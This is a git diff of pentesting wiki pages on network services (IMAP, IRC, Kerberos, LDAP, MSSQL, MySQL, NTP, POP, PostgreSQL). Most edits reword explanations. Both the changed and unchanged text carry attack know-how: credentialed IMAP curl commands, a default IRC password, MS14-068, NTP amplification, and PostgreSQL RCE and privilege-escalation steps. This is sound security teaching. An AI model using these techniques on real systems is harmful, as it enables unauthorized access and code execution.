-If you want to learn more about [**hacking printers read this page**](pentesting-printers/).
+Leveraging the **HTTP** protocol, IPP benefits from established security practices including **basic/digest authentication** and **SSL/TLS encryption**. Actions like submitting a print job or querying printer status are performed through **HTTP POST requests** directed at the IPP server, which operates on **port 631/tcp**.
+
+A well-known implementation of IPP is **CUPS**, an open-source printing system prevalent across various Linux distributions and OS X. Despite its utility, IPP, akin to LPD, can be exploited to transmit malicious content through **PostScript** or **PJL files**, highlighting a potential security risk.
+
+```python
+# Example of sending an IPP request using Python
+import requests
+
+url = "http://printer.example.com:631/ipp/print"
+headers = {"Content-Type": "application/ipp"}
+data = b"..."  # IPP request data goes here
+
+response = requests.post(url, headers=headers, data=data, verify=True)
+print(response.status_code)
+```
+
+If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page).
 
 
 
diff --git a/network-services-pentesting/pentesting-imap.md b/network-services-pentesting/pentesting-imap.md
index b694e2dc5..fe2605b6a 100644
--- a/network-services-pentesting/pentesting-imap.md
+++ b/network-services-pentesting/pentesting-imap.md
@@ -24,7 +24,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ## Internet Message Access Protocol
 
-As its name implies, IMAP allows you to **access your email messages wherever you are**; much of the time, it is accessed via the Internet. Basically, email **messages are stored on servers**. Whenever you check your inbox, your email client contacts the server to connect you with your messages. When you read an email message using IMAP, **you aren't actually downloading** or storing it on your computer; instead, you are **reading it off of the server**. As a result, it's possible to check your email from **several different devices** without missing a thing.
+The **Internet Message Access Protocol (IMAP)** is designed for the purpose of enabling users to **access their email messages from any location**, primarily through an Internet connection. In essence, emails are **retained on a server** rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done **directly from the server**. This capability allows for the convenience of checking emails from **multiple devices**, ensuring that no messages are missed regardless of the device used.
 
 By default, the IMAP protocol works on two ports:
 
@@ -126,37 +126,38 @@ Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-
 
 1.  Listing mailboxes (imap command `LIST "" "*"`)
 
-    ```bash
-     $ curl -k 'imaps://1.2.3.4/' --user user:pass
-    ```
+```bash
+curl -k 'imaps://1.2.3.4/' --user user:pass
+```
 2.  Listing messages in a mailbox (imap command `SELECT INBOX` and then `SEARCH ALL`)
 
-    ```bash
-     $ curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass
-    ```
+ ```bash
+curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass
+```
 
-    The result of this search is a list of message indicies.
+The result of this search is a list of message indicies.
 
-    Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
+Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
 
-    ```bash
-     $ curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass
-    ```
+```bash
+curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass
+```
+
+A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/).
 
-    A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/).
 3.  Downloading a message (imap command `SELECT Drafts` and then `FETCH 1 BODY[]`)
 
-    ```bash
-     $ curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass
-    ```
+```bash
+curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass
+```
 
-    The mail index will be the same index returned from the search operation.
+The mail index will be the same index returned from the search operation.
 
 It is also possible to use `UID` (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.
 
 ```bash
-$ curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass
-$ curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass
+curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass
+curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass
 ```
 
 Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages (the `-v` is required to see the subject and sender):
@@ -167,7 +168,7 @@ $ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM
 
 Although, its probably cleaner to just write a little for loop:
 
-```
+```bash
 for m in {1..5}; do
   echo $m
   curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
@@ -190,7 +191,7 @@ Entry_1:
   Name: Notes
   Description: Notes for WHOIS
   Note: |
-    As its name implies, IMAP allows you to access your email messages wherever you are; much of the time, it is accessed via the Internet. Basically, email messages are stored on servers. Whenever you check your inbox, your email client contacts the server to connect you with your messages. When you read an email message using IMAP, you aren't actually downloading or storing it on your computer; instead, you are reading it off of the server. As a result, it's possible to check your email from several different devices without missing a thing.
+    The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used.
 
     https://book.hacktricks.xyz/pentesting/pentesting-imap
 
diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md
index f913adc26..0014518dc 100644
--- a/network-services-pentesting/pentesting-irc.md
+++ b/network-services-pentesting/pentesting-irc.md
@@ -16,13 +16,11 @@ Other ways to support HackTricks:
 
 ## Basic Information
 
-IRC was **originally a plain text protocol** (although later extended), which on request was assigned port **194/TCP by IANA**. However, the de facto standard has always been to **run IRC on 6667/TCP** and nearby port numbers (for example TCP ports 6660–6669, 7000) to **avoid** having to run the IRCd software with **root privileges**.
+IRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation.
 
-For connecting to a server it is required merely a **nickname**. Once connection is established, the first thing the server does is a reverse-dns to your ip:
+A **nickname** is all that's needed to connect to a server. Following connection, the server performs a reverse-DNS lookup on the user's IP.
 
-![](https://lh5.googleusercontent.com/C9AbjS9Jn4GvZJ-syptvebGU2jtI4p1UmLsmkBj3--utdFjft1B3Qfij3GDiUqxyp9wq\_mbupVdUtfW-\_rSo1W\_EPFZzCQ7iHSn7-DK3l4-BfylIHluQBNrDWxO0lxCuAMz8EkQ9oi9jwDlH6A)
-
-It seems that overall **there are two kinds of users**: **operators** and ordinary **users**. For logging in as an **operator** it is required a **username** and a **password** (and in many occasions a particular hostname, ip and even a particular hostmask). Within operators there are different privilege levels wherein the administrator has the highest privilege.
+Users are divided into **operators**, who need a **username** and **password** for more access, and regular **users**. Operators have varying levels of privileges, with administrators at the top.
 
 **Default ports:** 194, 6667, 6660-7000
 
@@ -75,7 +73,7 @@ JOIN <CHANNEL_NAME>   #Connect to a channel
 OPER <USERNAME> <PASSWORD>
 ```
 
-You can, also, atttempt to login to the server with a password. The default password for ngIRCd is 'wealllikedebian'.
+You can, also, atttempt to login to the server with a password. The default password for ngIRCd is `wealllikedebian`.
 
 ```bash
 PASS wealllikedebian
diff --git a/network-services-pentesting/pentesting-kerberos-88/README.md b/network-services-pentesting/pentesting-kerberos-88/README.md
index a0bbe6ac0..a0c904534 100644
--- a/network-services-pentesting/pentesting-kerberos-88/README.md
+++ b/network-services-pentesting/pentesting-kerberos-88/README.md
@@ -16,8 +16,11 @@ Other ways to support HackTricks:
 
 ## Basic Information
 
-Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.\
-Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is the responsability of each service to determine if the user has access to its resources.
+**Kerberos** operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.
+
+In environments like **Active Directory**, **Kerberos** is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, **Kerberos** does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.
+
+After authentication by **Kerberos**, the decision-making process regarding access to resources is delegated to individual services within the network. These services are then responsible for evaluating the authenticated user's rights and permissions, based on the information provided by **Kerberos** about the user's privileges. This design allows for a separation of concerns between authenticating the identity of users and managing their access rights, enabling a more flexible and secure approach to resource management in distributed networks.
 
 **Default Port:** 88/tcp/udp
 
@@ -36,7 +39,7 @@ PORT   STATE SERVICE
 
 ### MS14-068
 
-Simply stated, the vulnerability enables an attacker to modify an existing, valid, domain user logon token (Kerberos Ticket Granting Ticket, TGT, ticket) by adding the false statement that the user is a member of Domain Admins (or other sensitive group) and the Domain Controller (DC) will validate that (false) claim enabling attacker improper access to any domain (in the AD forest) resource on the network.
+The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest.
 
 {% embed url="https://adsecurity.org/?p=541" %}
 
@@ -53,8 +56,8 @@ Entry_1:
   Name: Notes
   Description: Notes for Kerberos
   Note: |
-    Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.
-    Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is the responsability of each service to determine if the user has access to its resources.
+    Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.
+    In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.
 
     https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
 
diff --git a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
index 9c3383da8..d0c1280d8 100644
--- a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
+++ b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
@@ -49,7 +49,7 @@ Rubeus is a tool specifically tailored for Kerberos interaction and manipulation
 When using these commands, ensure to replace placeholders like `<BASE64_TICKET>` and `<luid>` with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.
 
 ## References
-* **[https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**​
+* [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-ldap.md b/network-services-pentesting/pentesting-ldap.md
index a128e21ee..ffabda5c8 100644
--- a/network-services-pentesting/pentesting-ldap.md
+++ b/network-services-pentesting/pentesting-ldap.md
@@ -14,20 +14,11 @@ Other ways to support HackTricks:
 
 </details>
 
-## Basic Information
+The use of **LDAP** (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
 
-LDAP (Lightweight Directory Access Protocol) is primarily utilized for the **location** of entities like organizations, individuals, and various **resources** (e.g., files, devices) within a network. This can be on a public platform like the Internet or within a private intranet. As a streamlined version of the Directory Access Protocol (DAP), LDAP involves a reduced code footprint.
-
-The structure of an LDAP directory permits its distribution across multiple servers. On each of these servers, a **replicated** form of the entire directory exists and is **synchronized** at regular intervals. In this context, an LDAP server is referred to as a Directory System Agent (DSA). When a user sends a request to an LDAP server, the server assumes full responsibility for that request. This involves communicating with other DSAs if necessary, but importantly, it ensures that the user receives a single, cohesive response.
-
-The organization of an LDAP directory is akin to a straightforward "tree" hierarchy, which includes several levels:
-
-- The highest level is the root directory, which acts as the tree's origin or source.
-    - This branches out to the next level, countries.
-        - Each country further divides into organizations.
-            - Organizations branch into organizational units. These units can represent different divisions or departments.
-                - The final level includes individual entities. This encompasses not just people but also shared resources like files and printers.
+LDAP directories are structured to allow their distribution across several servers, with each server housing a **replicated** and **synchronized** version of the directory, referred to as a Directory System Agent (DSA). Responsibility for handling requests lies entirely with the LDAP server, which may communicate with other DSAs as needed to deliver a unified response to the requester.
 
+The LDAP directory's organization resembles a **tree hierarchy, starting with the root directory at the top**. This branches down to countries, which further divide into organizations, and then to organizational units representing various divisions or departments, finally reaching the individual entities level, including both people and shared resources like files and printers.
 
 **Default port:** 389 and 636(ldaps). Global Catalog (LDAP in ActiveDirectory) is available by default on ports 3268, and 3269 for LDAPS.
 
@@ -186,7 +177,7 @@ True
 
 ### windapsearch
 
-[**Windapsearch**](https://github.com/ropnop/windapsearch) \*\*\*\* is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries.
+[**Windapsearch**](https://github.com/ropnop/windapsearch) is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries.
 
 ```bash
 # Get computers
@@ -403,7 +394,7 @@ Entry_1:
   Name: Notes
   Description: Notes for LDAP
   Note: |
-    LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a "lightweight" (smaller amount of code) version of Directory Access Protocol (DAP).
+    The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
 
     https://book.hacktricks.xyz/pentesting/pentesting-ldap
 
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index aec74ffbc..b08fb2fd7 100644
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -24,8 +24,9 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ## Basic Information
 
-**Microsoft SQL Server** is a **relational database** management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).\
-From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
+From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
+
+> **Microsoft SQL Server** is a **relational database** management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).\
 
 **Default port:** 1433
 
@@ -35,11 +36,12 @@ From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
 
 ### **Default MS-SQL System Tables**
 
-* **master Database**: Records all the system-level information for an instance of SQL Server.
-* **msdb Database**: Is used by SQL Server Agent for scheduling alerts and jobs.
-* **model Database**: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
-* **Resource Databas**: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
-* **tempdb Database** : Is a work-space for holding temporary objects or intermediate result sets.
+* **master Database**: This database is crucial as it captures all system-level details for a SQL Server instance.
+* **msdb Database**: SQL Server Agent utilizes this database to manage scheduling for alerts and jobs.
+* **model Database**: Acts as a blueprint for every new database on the SQL Server instance, where any alterations like size, collation, recovery model, and more are mirrored in newly created databases.
+* **Resource Database**: A read-only database that houses system objects that come with SQL Server. These objects, while stored physically in the Resource database, are logically presented in the sys schema of every database.
+* **tempdb Database**: Serves as a temporary storage area for transient objects or intermediate result sets.
+
 
 ## Enumeration
 
@@ -163,14 +165,16 @@ SELECT * FROM sysusers
 
 #### Get Permissions
 
-Some introduction about some MSSQL terms:
+1. **Securable:** Defined as the resources managed by SQL Server for access control. These are categorized into:
+   - **Server** – Examples include databases, logins, endpoints, availability groups, and server roles.
+   - **Database** – Examples cover database role, application roles, schema, certificates, full text catalogs, and users.
+   - **Schema** – Includes tables, views, procedures, functions, synonyms, etc.
 
-1. **Securable:** These are the resources to which the SQL Server Database Engine authorization system controls access. There are three broader categories under which a securable can be differentiated:
-   * Server – For example databases, logins, endpoints, availability groups and server roles
-   * Database – For example database role, application roles, schema, certificate, full text catalog, user
-   * Schema – For example table, view, procedure, function, synonym
-2. **Permission:** Every SQL Server securable has associated permissions like ALTER, CONTROL, CREATE that can be granted to a principal. Permissions are managed at the server level using logins and at the database level using users.
-3. **Principal:** The entity that receives permission to a securable is called a principal. The most common principals are logins and database users. Access to a securable is controlled by granting or denying permissions or by adding logins and users to roles which have access.
+2. **Permission:** Associated with SQL Server securables, permissions such as ALTER, CONTROL, and CREATE can be granted to a principal. Management of permissions occurs at two levels: 
+   - **Server Level** using logins
+   - **Database Level** using users
+
+3. **Principal:** This term refers to the entity that is granted permission to a securable. Principals mainly include logins and database users. The control over access to securables is exercised through the granting or denying of permissions or by including logins and users in roles equipped with access rights.
 
 ```sql
 # Show all different securables names
diff --git a/network-services-pentesting/pentesting-mysql.md b/network-services-pentesting/pentesting-mysql.md
index 2f29582a9..ce7090cc9 100644
--- a/network-services-pentesting/pentesting-mysql.md
+++ b/network-services-pentesting/pentesting-mysql.md
@@ -22,7 +22,7 @@ Other ways to support HackTricks:
 
 ## **Basic Information**
 
-**MySQL** is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**). From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
+**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases.
 
 **Default port:** 3306
 
@@ -184,16 +184,15 @@ systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=
 
 #### Dangerous Settings of mysqld.cnf
 
-From [https://academy.hackthebox.com/module/112/section/1238](https://academy.hackthebox.com/module/112/section/1238)
+In the configuration of MySQL services, various settings are employed to define its operation and security measures:
+
+- The **`user`** setting is utilized for designating the user under which the MySQL service will be executed.
+- **`password`** is applied for establishing the password associated with the MySQL user.
+- **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface.
+- The **`debug`** variable is indicative of the present debugging configurations, including sensitive information within logs.
+- **`sql_warnings`** manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.
+- With **`secure_file_priv`**, the scope of data import and export operations is constrained to enhance security.
 
-| **Settings**       | **Description**                                                                                                                           |
-| ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------- |
-| `user`             | Sets which user the MySQL service will run as.                                                                                            |
-| `password`         | Sets the password for the MySQL user.                                                                                                     |
-| `admin_address`    | The IP address on which to listen for TCP/IP connections on the administrative network interface.                                         |
-| `debug`            | This variable indicates the current debugging settings (sensitive info inside logs)                                                       |
-| `sql_warnings`     | This variable controls whether single-row INSERT statements produce an information string if warnings occur. (sensitive info inside logs) |
-| `secure_file_priv` | This variable is used to limit the effect of data import and export operations.                                                           |
 
 ### Privilege escalation
 
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md
index dd5417cb4..befb433e7 100644
--- a/network-services-pentesting/pentesting-ntp.md
+++ b/network-services-pentesting/pentesting-ntp.md
@@ -31,7 +31,15 @@ Stay informed with the newest bug bounties launching and crucial platform update
 
 ## Basic Information
 
-The Network Time Protocol (**NTP**) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.
+The **Network Time Protocol (NTP)** ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. 
+
+### Summary & Security Tips:
+- **Purpose**: Syncs device clocks over networks.
+- **Importance**: Critical for security, logging, and operations.
+- **Security Measures**:
+  - Use trusted NTP sources with authentication.
+  - Limit NTP server network access.
+  - Monitor synchronization for signs of tampering.
 
 **Default port:** 123/udp
 
@@ -64,9 +72,10 @@ nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 1
 
 [**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref)
 
-NTP protocol by design uses UDP to operate, which does not require any handshake like TCP, thus no record of the request. So, NTP DDoS amplification attack begins when an attacker crafts packets with a spoofed source IP to make the packets appear to be coming from the intended target and sends them to NTP server. Attacker initially crafts the packet of few bytes, but NTP responds with a large amount of data thus adding to amplification of this attack.
+The **NTP protocol**, using UDP, allows for operation without the need for handshake procedures, unlike TCP. This characteristic is exploited in **NTP DDoS amplification attacks**. Here, attackers create packets with a fake source IP, making it seem as if the attack requests come from the victim. These packets, initially small, prompt the NTP server to respond with much larger data volumes, amplifying the attack.
+
+The **_MONLIST_** command, despite its rare use, can report the last 600 clients connected to the NTP service. While the command itself is simple, its misuse in such attacks highlights critical security vulnerabilities.
 
-_MONLIST command_: It is a NTP protocol command which has very little use, but it is this command which is the main culprit for this attack. However, the use of MONLIST command is to give details of the last 600 clients that have connected to the NTP time service. Below is the command syntax:
 
 ```bash
 ntpdc -n -c monlist <IP>
@@ -87,7 +96,7 @@ Entry_1:
   Name: Notes
   Description: Notes for NTP
   Note: |
-    The Network Time Protocol (NTP) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.
+    The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. 
 
     https://book.hacktricks.xyz/pentesting/pentesting-ntp
 
diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md
index 49f6ddb61..a231efff5 100644
--- a/network-services-pentesting/pentesting-pop.md
+++ b/network-services-pentesting/pentesting-pop.md
@@ -22,9 +22,8 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ## Basic Information
 
-**Post Office Protocol** (**POP**) is a type of computer networking and Internet standard **protocol** that extracts and retrieves email from a remote mail server for access by the host machine. **POP** is an application layer **protocol** in the OSI model that provides end users the ability to fetch and receive email (from [here](https://www.techopedia.com/definition/5383/post-office-protocol-pop)).
+**Post Office Protocol (POP)** is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and **retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of **POP clients** typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, **POP3** stands out as the most prevalently employed version.
 
-The POP clients generally connect, retrieve all messages, store them on the client system, and delete them from the server. There are 3 versions of POP, but POP3 is the most used one.
 
 **Default ports:** 110, 995(ssl)
 
@@ -124,10 +123,9 @@ Entry_1:
   Name: Notes
   Description: Notes for POP
   Note: |
-    Post Office Protocol (POP) is a type of computer networking and Internet standard protocol that extracts and retrieves email from a remote mail server for access by the host machine. POP is an application layer protocol in the OSI model that provides end users the ability to fetch and receive email (from here).
-    The POP clients generally connect, retrieve all messages, store them on the client system, and delete them from the server. There are 3 versions of POP, but POP3 is the most used one.
+    Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version.
 
-    https://book.hacktricks.xyz/pentesting/pentesting-whois
+    https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop
 
 Entry_2:
   Name: Banner Grab
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md
index c378162de..24785959c 100644
--- a/network-services-pentesting/pentesting-postgresql.md
+++ b/network-services-pentesting/pentesting-postgresql.md
@@ -24,7 +24,7 @@ Other ways to support HackTricks:
 
 ## **Basic Information**
 
-**PostgreSQL** is an open source object-relational database system that uses and extends the SQL language.
+**PostgreSQL** is described as an **object-relational database system** that is **open source**. This system not only utilizes the SQL language but also enhances it with additional features. Its capabilities allow it to handle a wide range of data types and operations, making it a versatile choice for developers and organizations.
 
 **Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.
 
@@ -138,7 +138,7 @@ DETAIL:  could not connect to server: Connection timed out Is the server
 running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
 ```
 
-Unfortunately, there does not seem to be a way of getting the exception details within a PL/pgSQL function. But you can get the details if you can connect directly to the PostgreSQL server. If it is not possible to get usernames and passwords directly out of the system tables, the wordlist attack described in the previous section might prove successful.
+In PL/pgSQL functions, it is currently not possible to obtain exception details. However, if you have direct access to the PostgreSQL server, you can retrieve the necessary information. If extracting usernames and passwords from the system tables is not feasible, you may consider utilizing the wordlist attack method discussed in the preceding section, as it could potentially yield positive results.
 
 ## Enumeration of Privileges
 
@@ -399,6 +399,8 @@ The **configuration file** of postgresql is **writable** by the **postgres user*
 
 #### **RCE with ssl\_passphrase\_command**
 
+More information [about this technique here](https://pulsesecurity.co.nz/articles/postgres-sqli).
+
 The configuration file have some interesting attributes that can lead to RCE:
 
 * `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database
@@ -419,10 +421,10 @@ Then, an attacker will need to:
 
 While testing this I noticed that this will only work if the **private key file has privileges 640**, it's **owned by root** and by the **group ssl-cert or postgres** (so the postgres user can read it), and is placed in _/var/lib/postgresql/12/main_.
 
-**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.**
-
 #### **RCE with archive\_command**
 
+**More** [**information about this config and about WAL here**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.**
+
 Another attribute in the configuration file that is exploitable is `archive_command`.
 
 For this to work, the `archive_mode` setting has to be `'on'` or `'always'`. If that is true, then we could overwrite the command in `archive_command` and force it to execute via the WAL (write-ahead logging) operations.
@@ -434,8 +436,6 @@ The general steps are:
 3. Reload the config: `SELECT pg_reload_conf()`
 4. Force the WAL operation to run, which will call the archive command: `SELECT pg_switch_wal()` or `SELECT pg_switch_xlog()` for some Postgres versions
 
-**More** [**information about this config and about WAL here**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.**
-
 ## **Postgres Privesc**
 
 ### CREATEROLE Privesc
@@ -487,7 +487,7 @@ host    all             all             ::1/128                 trust
 
 ### **ALTER TABLE privesc**
 
-In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) is explained how it was possible to **privesc** in Postgres GCP abusing ALTER TABLE privilege that was granted to the user.
+In [**this writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) is explained how it was possible to **privesc** in Postgres GCP abusing ALTER TABLE privilege that was granted to the user.
 
 When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
 
@@ -503,11 +503,11 @@ SetUserIdAndSecContext(onerel->rd_rel->relowner,
 
 #### Exploitation
 
-1. Create a new table.
-2. Insert some dummy content to the table, so the index function has something to work with.
-3. Create a malicious index function (with our code execution payload) on the table.
-4. ALTER the table owner to cloudsqladmin , GCP’s superuser role, used only by Cloud SQL to maintain and manage the database.
-5. ANALYZE the table, forcing the PostgreSQL engine to switch user-context to the table's owner ( cloudsqladmin ) and call the malicious index function with the cloudsqladmin permissions, resulting in executing our shell command, which we did not have permission to execute before.
+1. Start by creating a new table.
+2. Insert some irrelevant content into the table to provide data for the index function.
+3. Develop a malicious index function that contains a code execution payload, allowing for unauthorized commands to be executed.
+4. ALTER the table's owner to "cloudsqladmin," which is GCP's superuser role exclusively used by Cloud SQL to manage and maintain the database.
+5. Perform an ANALYZE operation on the table. This action compels the PostgreSQL engine to switch to the user context of the table's owner, "cloudsqladmin." Consequently, the malicious index function is called with the permissions of "cloudsqladmin," thereby enabling the execution of the previously unauthorized shell command.
 
 In PostgreSQL, this flow looks something like this:
 
@@ -532,7 +532,7 @@ CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
 ANALYZE public.temp_table;
 ```
 
-After executing the exploit SQL query, the `shell_commands_results` table contains the output of the executed code:
+Then, the `shell_commands_results` table will contain the output of the executed code:
 
 ```
 uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
@@ -580,7 +580,7 @@ SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
 
 ### **Custom defined function with** SECURITY DEFINER
 
-\*\*\*\*[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**:
+[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**:
 
 <pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text) 
     RETURNS text 
@@ -617,7 +617,7 @@ And then **execute commands**:
 
 ### Pass Burteforce with PL/pgSQL
 
-PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.\
